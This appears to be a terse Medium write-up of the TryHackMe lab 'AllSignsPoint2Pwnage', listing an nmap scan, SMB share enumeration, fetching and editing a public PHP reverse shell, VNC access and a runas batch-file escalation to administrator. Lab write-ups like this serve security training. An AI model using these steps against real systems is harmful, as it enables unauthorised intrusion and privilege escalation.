TryHackMe | AllSignsPoint2Pwnage

nmap -sS -sV -vv --top-ports 1000 10.10.104.217 | grep open
Initial nmap scan
smbclient -L 10.10.104.217
git clone https://github.com/ivan-sincek/php-reverse-shell
Edit php-reverse-shell.php
initial shell
net share command
Install_www_and_deploy.bat
xvncviewer -QualityLevel 2 ip.address
  • Step 1: double click on the user_flag.txt
  • Step 2: Change the contents of the user_flag.txt file to be runas /user:administrator cmd.exe
  • Step 3: Save the file as pwn2.bat, my first attempt at a powershell escalation didn’t work quite so well.
  • Step 4: double click the pwn2.bat and paste in the admin password. #profit!
pwnage
complete

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store